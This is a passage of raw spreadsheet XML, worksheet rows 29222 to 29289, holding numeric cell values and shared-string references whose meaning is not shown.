      <c r="D29222" s="2">
        <v>1.0</v>
      </c>
      <c r="E29222" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29222" s="2">
        <v>0.1032986111111111</v>
      </c>
    </row>
    <row r="29223" ht="15.75" customHeight="1">
      <c r="A29223" s="1">
        <v>14079.0</v>
      </c>
      <c r="B29223" s="2">
        <v>3.7675436E7</v>
      </c>
      <c r="C29223" s="2" t="s">
        <v>28093</v>
      </c>
      <c r="D29223" s="2">
        <v>1.0</v>
      </c>
      <c r="E29223" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29223" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="29224" ht="15.75" customHeight="1">
      <c r="A29224" s="1">
        <v>23658.0</v>
      </c>
      <c r="B29224" s="2">
        <v>6826176.0</v>
      </c>
      <c r="C29224" s="2" t="s">
        <v>28094</v>
      </c>
      <c r="D29224" s="2">
        <v>1.0</v>
      </c>
      <c r="E29224" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29224" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="29225" ht="15.75" customHeight="1">
      <c r="A29225" s="1">
        <v>24351.0</v>
      </c>
      <c r="B29225" s="2">
        <v>1.0717699E7</v>
      </c>
      <c r="C29225" s="2" t="s">
        <v>28095</v>
      </c>
      <c r="D29225" s="2">
        <v>1.0</v>
      </c>
      <c r="E29225" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29225" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="29226" ht="15.75" customHeight="1">
      <c r="A29226" s="1">
        <v>27850.0</v>
      </c>
      <c r="B29226" s="2">
        <v>2.3427412E7</v>
      </c>
      <c r="C29226" s="2" t="s">
        <v>28096</v>
      </c>
      <c r="D29226" s="2">
        <v>1.0</v>
      </c>
      <c r="E29226" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29226" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="29227" ht="15.75" customHeight="1">
      <c r="A29227" s="1">
        <v>15977.0</v>
      </c>
      <c r="B29227" s="2">
        <v>4.4857286E7</v>
      </c>
      <c r="C29227" s="2" t="s">
        <v>28097</v>
      </c>
      <c r="D29227" s="2">
        <v>1.0</v>
      </c>
      <c r="E29227" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29227" s="2">
        <v>0.1026365348399247</v>
      </c>
    </row>
    <row r="29228" ht="15.75" customHeight="1">
      <c r="A29228" s="1">
        <v>10063.0</v>
      </c>
      <c r="B29228" s="2">
        <v>5.7128386E7</v>
      </c>
      <c r="C29228" s="2" t="s">
        <v>28098</v>
      </c>
      <c r="D29228" s="2">
        <v>1.0</v>
      </c>
      <c r="E29228" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29228" s="2">
        <v>0.1024904214559387</v>
      </c>
    </row>
    <row r="29229" ht="15.75" customHeight="1">
      <c r="A29229" s="1">
        <v>15256.0</v>
      </c>
      <c r="B29229" s="2">
        <v>4.2299966E7</v>
      </c>
      <c r="C29229" s="2" t="s">
        <v>28099</v>
      </c>
      <c r="D29229" s="2">
        <v>1.0</v>
      </c>
      <c r="E29229" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29229" s="2">
        <v>0.1024904214559387</v>
      </c>
    </row>
    <row r="29230" ht="15.75" customHeight="1">
      <c r="A29230" s="1">
        <v>2215.0</v>
      </c>
      <c r="B29230" s="2">
        <v>3.2107585E7</v>
      </c>
      <c r="C29230" s="2" t="s">
        <v>28100</v>
      </c>
      <c r="D29230" s="2">
        <v>1.0</v>
      </c>
      <c r="E29230" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29230" s="2">
        <v>0.1023391812865497</v>
      </c>
    </row>
    <row r="29231" ht="15.75" customHeight="1">
      <c r="A29231" s="1">
        <v>9472.0</v>
      </c>
      <c r="B29231" s="2">
        <v>5.5866679E7</v>
      </c>
      <c r="C29231" s="2" t="s">
        <v>28101</v>
      </c>
      <c r="D29231" s="2">
        <v>1.0</v>
      </c>
      <c r="E29231" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29231" s="2">
        <v>0.1023391812865497</v>
      </c>
    </row>
    <row r="29232" ht="15.75" customHeight="1">
      <c r="A29232" s="1">
        <v>22000.0</v>
      </c>
      <c r="B29232" s="2">
        <v>2.9671887E7</v>
      </c>
      <c r="C29232" s="2" t="s">
        <v>28102</v>
      </c>
      <c r="D29232" s="2">
        <v>1.0</v>
      </c>
      <c r="E29232" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29232" s="2">
        <v>0.1023391812865497</v>
      </c>
    </row>
    <row r="29233" ht="15.75" customHeight="1">
      <c r="A29233" s="1">
        <v>24535.0</v>
      </c>
      <c r="B29233" s="2">
        <v>1.1209822E7</v>
      </c>
      <c r="C29233" s="2" t="s">
        <v>28103</v>
      </c>
      <c r="D29233" s="2">
        <v>1.0</v>
      </c>
      <c r="E29233" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29233" s="2">
        <v>0.1023391812865497</v>
      </c>
    </row>
    <row r="29234" ht="15.75" customHeight="1">
      <c r="A29234" s="1">
        <v>25114.0</v>
      </c>
      <c r="B29234" s="2">
        <v>1.2969432E7</v>
      </c>
      <c r="C29234" s="2" t="s">
        <v>28104</v>
      </c>
      <c r="D29234" s="2">
        <v>1.0</v>
      </c>
      <c r="E29234" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29234" s="2">
        <v>0.1023391812865497</v>
      </c>
    </row>
    <row r="29235" ht="15.75" customHeight="1">
      <c r="A29235" s="1">
        <v>26825.0</v>
      </c>
      <c r="B29235" s="2">
        <v>1.8847999E7</v>
      </c>
      <c r="C29235" s="2" t="s">
        <v>28105</v>
      </c>
      <c r="D29235" s="2">
        <v>1.0</v>
      </c>
      <c r="E29235" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29235" s="2">
        <v>0.1023391812865497</v>
      </c>
    </row>
    <row r="29236" ht="15.75" customHeight="1">
      <c r="A29236" s="1">
        <v>9278.0</v>
      </c>
      <c r="B29236" s="2">
        <v>5.5518556E7</v>
      </c>
      <c r="C29236" s="2" t="s">
        <v>28106</v>
      </c>
      <c r="D29236" s="2">
        <v>1.0</v>
      </c>
      <c r="E29236" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29236" s="2">
        <v>0.1021825396825397</v>
      </c>
    </row>
    <row r="29237" ht="15.75" customHeight="1">
      <c r="A29237" s="1">
        <v>12469.0</v>
      </c>
      <c r="B29237" s="2">
        <v>2.9418286E7</v>
      </c>
      <c r="C29237" s="2" t="s">
        <v>28107</v>
      </c>
      <c r="D29237" s="2">
        <v>1.0</v>
      </c>
      <c r="E29237" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29237" s="2">
        <v>0.1021825396825397</v>
      </c>
    </row>
    <row r="29238" ht="15.75" customHeight="1">
      <c r="A29238" s="1">
        <v>14951.0</v>
      </c>
      <c r="B29238" s="2">
        <v>4.1300796E7</v>
      </c>
      <c r="C29238" s="2" t="s">
        <v>28108</v>
      </c>
      <c r="D29238" s="2">
        <v>1.0</v>
      </c>
      <c r="E29238" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29238" s="2">
        <v>0.1021825396825397</v>
      </c>
    </row>
    <row r="29239" ht="15.75" customHeight="1">
      <c r="A29239" s="1">
        <v>17525.0</v>
      </c>
      <c r="B29239" s="2">
        <v>5.0096281E7</v>
      </c>
      <c r="C29239" s="2" t="s">
        <v>28109</v>
      </c>
      <c r="D29239" s="2">
        <v>1.0</v>
      </c>
      <c r="E29239" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29239" s="2">
        <v>0.1021825396825397</v>
      </c>
    </row>
    <row r="29240" ht="15.75" customHeight="1">
      <c r="A29240" s="1">
        <v>20344.0</v>
      </c>
      <c r="B29240" s="2">
        <v>1.1612766E7</v>
      </c>
      <c r="C29240" s="2" t="s">
        <v>28110</v>
      </c>
      <c r="D29240" s="2">
        <v>1.0</v>
      </c>
      <c r="E29240" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29240" s="2">
        <v>0.1021825396825397</v>
      </c>
    </row>
    <row r="29241" ht="15.75" customHeight="1">
      <c r="A29241" s="1">
        <v>29272.0</v>
      </c>
      <c r="B29241" s="2">
        <v>3.0994721E7</v>
      </c>
      <c r="C29241" s="2" t="s">
        <v>28111</v>
      </c>
      <c r="D29241" s="2">
        <v>1.0</v>
      </c>
      <c r="E29241" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29241" s="2">
        <v>0.1021825396825397</v>
      </c>
    </row>
    <row r="29242" ht="15.75" customHeight="1">
      <c r="A29242" s="1">
        <v>33487.0</v>
      </c>
      <c r="B29242" s="2">
        <v>7997737.0</v>
      </c>
      <c r="C29242" s="2" t="s">
        <v>28112</v>
      </c>
      <c r="D29242" s="2">
        <v>1.0</v>
      </c>
      <c r="E29242" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29242" s="2">
        <v>0.1021825396825397</v>
      </c>
    </row>
    <row r="29243" ht="15.75" customHeight="1">
      <c r="A29243" s="1">
        <v>291.0</v>
      </c>
      <c r="B29243" s="2">
        <v>1.5467607E7</v>
      </c>
      <c r="C29243" s="2" t="s">
        <v>28113</v>
      </c>
      <c r="D29243" s="2">
        <v>1.0</v>
      </c>
      <c r="E29243" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29243" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
    <row r="29244" ht="15.75" customHeight="1">
      <c r="A29244" s="1">
        <v>572.0</v>
      </c>
      <c r="B29244" s="2">
        <v>1.9081698E7</v>
      </c>
      <c r="C29244" s="2" t="s">
        <v>28114</v>
      </c>
      <c r="D29244" s="2">
        <v>1.0</v>
      </c>
      <c r="E29244" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29244" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
    <row r="29245" ht="15.75" customHeight="1">
      <c r="A29245" s="1">
        <v>5997.0</v>
      </c>
      <c r="B29245" s="2">
        <v>4.7453057E7</v>
      </c>
      <c r="C29245" s="2" t="s">
        <v>28115</v>
      </c>
      <c r="D29245" s="2">
        <v>1.0</v>
      </c>
      <c r="E29245" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29245" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
    <row r="29246" ht="15.75" customHeight="1">
      <c r="A29246" s="1">
        <v>10454.0</v>
      </c>
      <c r="B29246" s="2">
        <v>1.0626375E7</v>
      </c>
      <c r="C29246" s="2" t="s">
        <v>28116</v>
      </c>
      <c r="D29246" s="2">
        <v>1.0</v>
      </c>
      <c r="E29246" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29246" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
    <row r="29247" ht="15.75" customHeight="1">
      <c r="A29247" s="1">
        <v>12450.0</v>
      </c>
      <c r="B29247" s="2">
        <v>2.9304961E7</v>
      </c>
      <c r="C29247" s="2" t="s">
        <v>28117</v>
      </c>
      <c r="D29247" s="2">
        <v>1.0</v>
      </c>
      <c r="E29247" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29247" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
    <row r="29248" ht="15.75" customHeight="1">
      <c r="A29248" s="1">
        <v>24366.0</v>
      </c>
      <c r="B29248" s="2">
        <v>1.0742088E7</v>
      </c>
      <c r="C29248" s="2" t="s">
        <v>28118</v>
      </c>
      <c r="D29248" s="2">
        <v>1.0</v>
      </c>
      <c r="E29248" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29248" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
    <row r="29249" ht="15.75" customHeight="1">
      <c r="A29249" s="1">
        <v>29076.0</v>
      </c>
      <c r="B29249" s="2">
        <v>3.0320592E7</v>
      </c>
      <c r="C29249" s="2" t="s">
        <v>28119</v>
      </c>
      <c r="D29249" s="2">
        <v>1.0</v>
      </c>
      <c r="E29249" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29249" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
    <row r="29250" ht="15.75" customHeight="1">
      <c r="A29250" s="1">
        <v>54.0</v>
      </c>
      <c r="B29250" s="2">
        <v>1.097302E7</v>
      </c>
      <c r="C29250" s="2" t="s">
        <v>28120</v>
      </c>
      <c r="D29250" s="2">
        <v>1.0</v>
      </c>
      <c r="E29250" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29250" s="2">
        <v>0.1018518518518518</v>
      </c>
    </row>
    <row r="29251" ht="15.75" customHeight="1">
      <c r="A29251" s="1">
        <v>4587.0</v>
      </c>
      <c r="B29251" s="2">
        <v>4.2793638E7</v>
      </c>
      <c r="C29251" s="2" t="s">
        <v>28121</v>
      </c>
      <c r="D29251" s="2">
        <v>1.0</v>
      </c>
      <c r="E29251" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29251" s="2">
        <v>0.1018518518518518</v>
      </c>
    </row>
    <row r="29252" ht="15.75" customHeight="1">
      <c r="A29252" s="1">
        <v>5774.0</v>
      </c>
      <c r="B29252" s="2">
        <v>4.67161E7</v>
      </c>
      <c r="C29252" s="2" t="s">
        <v>28122</v>
      </c>
      <c r="D29252" s="2">
        <v>1.0</v>
      </c>
      <c r="E29252" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29252" s="2">
        <v>0.1018518518518518</v>
      </c>
    </row>
    <row r="29253" ht="15.75" customHeight="1">
      <c r="A29253" s="1">
        <v>5856.0</v>
      </c>
      <c r="B29253" s="2">
        <v>4.6942192E7</v>
      </c>
      <c r="C29253" s="2" t="s">
        <v>28123</v>
      </c>
      <c r="D29253" s="2">
        <v>1.0</v>
      </c>
      <c r="E29253" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29253" s="2">
        <v>0.1018518518518518</v>
      </c>
    </row>
    <row r="29254" ht="15.75" customHeight="1">
      <c r="A29254" s="1">
        <v>8311.0</v>
      </c>
      <c r="B29254" s="2">
        <v>5.3618447E7</v>
      </c>
      <c r="C29254" s="2" t="s">
        <v>28124</v>
      </c>
      <c r="D29254" s="2">
        <v>1.0</v>
      </c>
      <c r="E29254" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29254" s="2">
        <v>0.1018518518518518</v>
      </c>
    </row>
    <row r="29255" ht="15.75" customHeight="1">
      <c r="A29255" s="1">
        <v>11273.0</v>
      </c>
      <c r="B29255" s="2">
        <v>2.072727E7</v>
      </c>
      <c r="C29255" s="2" t="s">
        <v>28125</v>
      </c>
      <c r="D29255" s="2">
        <v>1.0</v>
      </c>
      <c r="E29255" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29255" s="2">
        <v>0.1018518518518518</v>
      </c>
    </row>
    <row r="29256" ht="15.75" customHeight="1">
      <c r="A29256" s="1">
        <v>18804.0</v>
      </c>
      <c r="B29256" s="2">
        <v>5.3881829E7</v>
      </c>
      <c r="C29256" s="2" t="s">
        <v>28126</v>
      </c>
      <c r="D29256" s="2">
        <v>1.0</v>
      </c>
      <c r="E29256" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29256" s="2">
        <v>0.1018518518518518</v>
      </c>
    </row>
    <row r="29257" ht="15.75" customHeight="1">
      <c r="A29257" s="1">
        <v>19352.0</v>
      </c>
      <c r="B29257" s="2">
        <v>5.5391926E7</v>
      </c>
      <c r="C29257" s="2" t="s">
        <v>28127</v>
      </c>
      <c r="D29257" s="2">
        <v>1.0</v>
      </c>
      <c r="E29257" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29257" s="2">
        <v>0.1018518518518518</v>
      </c>
    </row>
    <row r="29258" ht="15.75" customHeight="1">
      <c r="A29258" s="1">
        <v>26896.0</v>
      </c>
      <c r="B29258" s="2">
        <v>1.9270117E7</v>
      </c>
      <c r="C29258" s="2" t="s">
        <v>28128</v>
      </c>
      <c r="D29258" s="2">
        <v>1.0</v>
      </c>
      <c r="E29258" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29258" s="2">
        <v>0.1018518518518518</v>
      </c>
    </row>
    <row r="29259" ht="15.75" customHeight="1">
      <c r="A29259" s="1">
        <v>27174.0</v>
      </c>
      <c r="B29259" s="2">
        <v>2.0857364E7</v>
      </c>
      <c r="C29259" s="2" t="s">
        <v>28017</v>
      </c>
      <c r="D29259" s="2">
        <v>1.0</v>
      </c>
      <c r="E29259" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29259" s="2">
        <v>0.1018518518518518</v>
      </c>
    </row>
    <row r="29260" ht="15.75" customHeight="1">
      <c r="A29260" s="1">
        <v>33188.0</v>
      </c>
      <c r="B29260" s="2">
        <v>7125506.0</v>
      </c>
      <c r="C29260" s="2" t="s">
        <v>28129</v>
      </c>
      <c r="D29260" s="2">
        <v>1.0</v>
      </c>
      <c r="E29260" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29260" s="2">
        <v>0.1018518518518518</v>
      </c>
    </row>
    <row r="29261" ht="15.75" customHeight="1">
      <c r="A29261" s="1">
        <v>34196.0</v>
      </c>
      <c r="B29261" s="2">
        <v>9976516.0</v>
      </c>
      <c r="C29261" s="2" t="s">
        <v>28130</v>
      </c>
      <c r="D29261" s="2">
        <v>1.0</v>
      </c>
      <c r="E29261" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29261" s="2">
        <v>0.1018518518518518</v>
      </c>
    </row>
    <row r="29262" ht="15.75" customHeight="1">
      <c r="A29262" s="1">
        <v>12201.0</v>
      </c>
      <c r="B29262" s="2">
        <v>2.7500534E7</v>
      </c>
      <c r="C29262" s="2" t="s">
        <v>28131</v>
      </c>
      <c r="D29262" s="2">
        <v>1.0</v>
      </c>
      <c r="E29262" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29262" s="2">
        <v>0.1016771488469602</v>
      </c>
    </row>
    <row r="29263" ht="15.75" customHeight="1">
      <c r="A29263" s="1">
        <v>19263.0</v>
      </c>
      <c r="B29263" s="2">
        <v>5.5128777E7</v>
      </c>
      <c r="C29263" s="2" t="s">
        <v>28132</v>
      </c>
      <c r="D29263" s="2">
        <v>1.0</v>
      </c>
      <c r="E29263" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29263" s="2">
        <v>0.1016771488469602</v>
      </c>
    </row>
    <row r="29264" ht="15.75" customHeight="1">
      <c r="A29264" s="1">
        <v>29728.0</v>
      </c>
      <c r="B29264" s="2">
        <v>3.456165E7</v>
      </c>
      <c r="C29264" s="2" t="s">
        <v>28133</v>
      </c>
      <c r="D29264" s="2">
        <v>1.0</v>
      </c>
      <c r="E29264" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29264" s="2">
        <v>0.1016771488469602</v>
      </c>
    </row>
    <row r="29265" ht="15.75" customHeight="1">
      <c r="A29265" s="1">
        <v>16958.0</v>
      </c>
      <c r="B29265" s="2">
        <v>4.8253895E7</v>
      </c>
      <c r="C29265" s="2" t="s">
        <v>28134</v>
      </c>
      <c r="D29265" s="2">
        <v>1.0</v>
      </c>
      <c r="E29265" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29265" s="2">
        <v>0.1015625</v>
      </c>
    </row>
    <row r="29266" ht="15.75" customHeight="1">
      <c r="A29266" s="1">
        <v>6488.0</v>
      </c>
      <c r="B29266" s="2">
        <v>4.8684065E7</v>
      </c>
      <c r="C29266" s="2" t="s">
        <v>28135</v>
      </c>
      <c r="D29266" s="2">
        <v>1.0</v>
      </c>
      <c r="E29266" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29266" s="2">
        <v>0.1014957264957265</v>
      </c>
    </row>
    <row r="29267" ht="15.75" customHeight="1">
      <c r="A29267" s="1">
        <v>19472.0</v>
      </c>
      <c r="B29267" s="2">
        <v>5.5830252E7</v>
      </c>
      <c r="C29267" s="2" t="s">
        <v>28136</v>
      </c>
      <c r="D29267" s="2">
        <v>1.0</v>
      </c>
      <c r="E29267" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29267" s="2">
        <v>0.1014957264957265</v>
      </c>
    </row>
    <row r="29268" ht="15.75" customHeight="1">
      <c r="A29268" s="1">
        <v>25925.0</v>
      </c>
      <c r="B29268" s="2">
        <v>1.5186025E7</v>
      </c>
      <c r="C29268" s="2" t="s">
        <v>28137</v>
      </c>
      <c r="D29268" s="2">
        <v>1.0</v>
      </c>
      <c r="E29268" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29268" s="2">
        <v>0.1014957264957265</v>
      </c>
    </row>
    <row r="29269" ht="15.75" customHeight="1">
      <c r="A29269" s="1">
        <v>33163.0</v>
      </c>
      <c r="B29269" s="2">
        <v>7086085.0</v>
      </c>
      <c r="C29269" s="2" t="s">
        <v>27841</v>
      </c>
      <c r="D29269" s="2">
        <v>1.0</v>
      </c>
      <c r="E29269" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29269" s="2">
        <v>0.1014957264957265</v>
      </c>
    </row>
    <row r="29270" ht="15.75" customHeight="1">
      <c r="A29270" s="1">
        <v>168.0</v>
      </c>
      <c r="B29270" s="2">
        <v>1.3797471E7</v>
      </c>
      <c r="C29270" s="2" t="s">
        <v>28138</v>
      </c>
      <c r="D29270" s="2">
        <v>1.0</v>
      </c>
      <c r="E29270" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29270" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29271" ht="15.75" customHeight="1">
      <c r="A29271" s="1">
        <v>298.0</v>
      </c>
      <c r="B29271" s="2">
        <v>1.5508655E7</v>
      </c>
      <c r="C29271" s="2" t="s">
        <v>28139</v>
      </c>
      <c r="D29271" s="2">
        <v>1.0</v>
      </c>
      <c r="E29271" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29271" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29272" ht="15.75" customHeight="1">
      <c r="A29272" s="1">
        <v>1345.0</v>
      </c>
      <c r="B29272" s="2">
        <v>2.5896629E7</v>
      </c>
      <c r="C29272" s="2" t="s">
        <v>28140</v>
      </c>
      <c r="D29272" s="2">
        <v>1.0</v>
      </c>
      <c r="E29272" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29272" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29273" ht="15.75" customHeight="1">
      <c r="A29273" s="1">
        <v>1612.0</v>
      </c>
      <c r="B29273" s="2">
        <v>2.7819515E7</v>
      </c>
      <c r="C29273" s="2" t="s">
        <v>28141</v>
      </c>
      <c r="D29273" s="2">
        <v>1.0</v>
      </c>
      <c r="E29273" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29273" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29274" ht="15.75" customHeight="1">
      <c r="A29274" s="1">
        <v>1850.0</v>
      </c>
      <c r="B29274" s="2">
        <v>2946749.0</v>
      </c>
      <c r="C29274" s="2" t="s">
        <v>28142</v>
      </c>
      <c r="D29274" s="2">
        <v>1.0</v>
      </c>
      <c r="E29274" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29274" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29275" ht="15.75" customHeight="1">
      <c r="A29275" s="1">
        <v>1870.0</v>
      </c>
      <c r="B29275" s="2">
        <v>2.9616749E7</v>
      </c>
      <c r="C29275" s="2" t="s">
        <v>28143</v>
      </c>
      <c r="D29275" s="2">
        <v>1.0</v>
      </c>
      <c r="E29275" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29275" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29276" ht="15.75" customHeight="1">
      <c r="A29276" s="1">
        <v>2392.0</v>
      </c>
      <c r="B29276" s="2">
        <v>3.3351471E7</v>
      </c>
      <c r="C29276" s="2" t="s">
        <v>28144</v>
      </c>
      <c r="D29276" s="2">
        <v>1.0</v>
      </c>
      <c r="E29276" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29276" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29277" ht="15.75" customHeight="1">
      <c r="A29277" s="1">
        <v>3293.0</v>
      </c>
      <c r="B29277" s="2">
        <v>3.7513189E7</v>
      </c>
      <c r="C29277" s="2" t="s">
        <v>28145</v>
      </c>
      <c r="D29277" s="2">
        <v>1.0</v>
      </c>
      <c r="E29277" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29277" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29278" ht="15.75" customHeight="1">
      <c r="A29278" s="1">
        <v>3309.0</v>
      </c>
      <c r="B29278" s="2">
        <v>3.7599106E7</v>
      </c>
      <c r="C29278" s="2" t="s">
        <v>28146</v>
      </c>
      <c r="D29278" s="2">
        <v>1.0</v>
      </c>
      <c r="E29278" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29278" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29279" ht="15.75" customHeight="1">
      <c r="A29279" s="1">
        <v>3375.0</v>
      </c>
      <c r="B29279" s="2">
        <v>3.7916921E7</v>
      </c>
      <c r="C29279" s="2" t="s">
        <v>28147</v>
      </c>
      <c r="D29279" s="2">
        <v>1.0</v>
      </c>
      <c r="E29279" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29279" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29280" ht="15.75" customHeight="1">
      <c r="A29280" s="1">
        <v>3779.0</v>
      </c>
      <c r="B29280" s="2">
        <v>3.9908068E7</v>
      </c>
      <c r="C29280" s="2" t="s">
        <v>28148</v>
      </c>
      <c r="D29280" s="2">
        <v>1.0</v>
      </c>
      <c r="E29280" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29280" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29281" ht="15.75" customHeight="1">
      <c r="A29281" s="1">
        <v>3919.0</v>
      </c>
      <c r="B29281" s="2">
        <v>4.0552383E7</v>
      </c>
      <c r="C29281" s="2" t="s">
        <v>28149</v>
      </c>
      <c r="D29281" s="2">
        <v>1.0</v>
      </c>
      <c r="E29281" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29281" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29282" ht="15.75" customHeight="1">
      <c r="A29282" s="1">
        <v>4529.0</v>
      </c>
      <c r="B29282" s="2">
        <v>4.2617807E7</v>
      </c>
      <c r="C29282" s="2" t="s">
        <v>28150</v>
      </c>
      <c r="D29282" s="2">
        <v>1.0</v>
      </c>
      <c r="E29282" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29282" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29283" ht="15.75" customHeight="1">
      <c r="A29283" s="1">
        <v>4861.0</v>
      </c>
      <c r="B29283" s="2">
        <v>4.3812596E7</v>
      </c>
      <c r="C29283" s="2" t="s">
        <v>28151</v>
      </c>
      <c r="D29283" s="2">
        <v>1.0</v>
      </c>
      <c r="E29283" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29283" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29284" ht="15.75" customHeight="1">
      <c r="A29284" s="1">
        <v>4867.0</v>
      </c>
      <c r="B29284" s="2">
        <v>4.3826149E7</v>
      </c>
      <c r="C29284" s="2" t="s">
        <v>28152</v>
      </c>
      <c r="D29284" s="2">
        <v>1.0</v>
      </c>
      <c r="E29284" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29284" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29285" ht="15.75" customHeight="1">
      <c r="A29285" s="1">
        <v>4913.0</v>
      </c>
      <c r="B29285" s="2">
        <v>4.3937226E7</v>
      </c>
      <c r="C29285" s="2" t="s">
        <v>28153</v>
      </c>
      <c r="D29285" s="2">
        <v>1.0</v>
      </c>
      <c r="E29285" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29285" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29286" ht="15.75" customHeight="1">
      <c r="A29286" s="1">
        <v>5027.0</v>
      </c>
      <c r="B29286" s="2">
        <v>4.4244375E7</v>
      </c>
      <c r="C29286" s="2" t="s">
        <v>28154</v>
      </c>
      <c r="D29286" s="2">
        <v>1.0</v>
      </c>
      <c r="E29286" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29286" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29287" ht="15.75" customHeight="1">
      <c r="A29287" s="1">
        <v>5087.0</v>
      </c>
      <c r="B29287" s="2">
        <v>4.4483401E7</v>
      </c>
      <c r="C29287" s="2" t="s">
        <v>28155</v>
      </c>
      <c r="D29287" s="2">
        <v>1.0</v>
      </c>
      <c r="E29287" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29287" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29288" ht="15.75" customHeight="1">
      <c r="A29288" s="1">
        <v>5118.0</v>
      </c>
      <c r="B29288" s="2">
        <v>4.4554255E7</v>
      </c>
      <c r="C29288" s="2" t="s">
        <v>28156</v>
      </c>
      <c r="D29288" s="2">
        <v>1.0</v>
      </c>
      <c r="E29288" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29288" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29289" ht="15.75" customHeight="1">
      <c r="A29289" s="1">
        <v>5164.0</v>
      </c>
      <c r="B29289" s="2">
        <v>4.4750867E7</v>
      </c>
      <c r="C29289" s="2" t="s">
        <v>28157</v>
      </c>
      <c r="D29289" s="2">
